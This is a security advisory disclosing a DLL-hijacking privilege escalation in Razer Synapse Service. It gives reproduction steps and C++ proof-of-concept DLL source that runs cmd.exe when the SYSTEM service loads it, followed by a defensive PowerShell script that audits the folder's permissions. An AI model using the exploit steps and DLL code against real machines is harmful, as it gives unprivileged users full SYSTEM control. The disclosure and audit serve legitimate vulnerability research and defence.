Discovered by: Juan Sacco <jsacco@exploitpack.com>  
Razer Synapse Service v1.0.0 is prone to DLL injection because it  
fails to properly filter user-supplied input and loads a .DLL from  
%ProgramData%, which is writable from userland, with SYSTEM rights.  
This allows a regular user to escalate privileges to SYSTEM.  
  
Program: Razer Synapse Service  
Version: 1.0.0  
Vendor: https://www.razer.com/  
Download link: https://www.razer.com/downloads  
  
Steps To Reproduce:  
Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll  
Restart the PC or restart the service. The service runs with SYSTEM rights.  
Enjoy your privilege escalation!  
  
Supporting Material/References:  
ProgramData specifies the path to the program-data folder (normally  
C:\ProgramData). Unlike the Program Files folder, this folder can be  
used by applications to store data for standard users, because it does  
not require elevated permissions. Reference:  
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback  
  
Razer Synapse Service.exe loads a DLL (HID.dll) from the  
ProgramData\Razer\Synapse3\Service\ folder with the function  
"HidD_GetHidGuid()". Using the following code we can compile a DLL and  
export this function from it so that it is called during attach.  
  
    // dllmain.cpp : Defines the entry point for the DLL application.
    #include "pch.h"
    #include "windows.h"

    BOOL APIENTRY DllMain( HMODULE hModule,
                           DWORD ul_reason_for_call,
                           LPVOID lpReserved
                         )
    {
        char cmd[] = "cmd.exe /c";
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_THREAD_ATTACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_THREAD_DETACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
        case DLL_PROCESS_DETACH:
            WinExec(cmd, SW_SHOWNORMAL);
            ExitProcess(0);
            break;
        }
        return TRUE;
    }

    // Export with the name the service resolves from HID.dll.
    extern "C" __declspec(dllexport) void HidD_GetHidGuid()
    {
        char cmd[] = "cmd.exe /c";
        WinExec(cmd, SW_SHOWNORMAL);
    }
  
Impact  
A regular user could abuse this vulnerability to gain full SYSTEM rights.
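
The condition described above can be checked from the defender's side. The PowerShell below is an added example, not part of the original advisory or the vendor's code: it audits the load path named in the steps (or its nearest existing ancestor if the folder is missing) for write access granted to standard-user principals, and reports the signature of any HID.dll found there. The list of principals and the rights mask are assumptions about what counts as low-privileged write access.

```powershell
# Added example (not from the advisory): audit the DLL load path it names.
$dir = 'C:\ProgramData\Razer\Synapse3\Service\Bin'   # path from the advisory
$dll = Join-Path $dir 'HID.dll'

# Well-known SIDs of low-privileged principals (locale-independent).
$lowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# WriteData/CreateFiles (0x2), AppendData/CreateDirectories (0x4),
# GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000).
$writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

function Get-LowPrivWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        # Allow ACEs only; an explicit Deny could still override these.
        if ($ace.AccessControlType -eq 'Allow' -and $lowPriv.ContainsKey($sid) -and
            ([int]$ace.FileSystemRights -band $writeMask)) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $lowPriv[$sid]
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# If the Bin folder is missing, whoever can write to its nearest existing
# ancestor can create it, so audit that ancestor instead.
$target = $dir
while ($target -and -not (Test-Path -LiteralPath $target)) {
    $target = Split-Path -Path $target -Parent
}
$findings = @(Get-LowPrivWriteAce -Path $target)
if (Test-Path -LiteralPath $dll) {
    $findings += @(Get-LowPrivWriteAce -Path $dll)
    # Record who signed the DLL that the SYSTEM service would load.
    Get-AuthenticodeSignature -LiteralPath $dll |
        Select-Object Path, Status, @{ n = 'Signer'; e = { $_.SignerCertificate.Subject } }
}
if ($findings) { $findings | Format-Table -AutoSize }
else { "No low-privileged write access found on $target" }
```

Any row in the output means a standard user can plant or replace a file on the path the SYSTEM service loads from; tightening that ACL to administrators and SYSTEM closes the gap on the host.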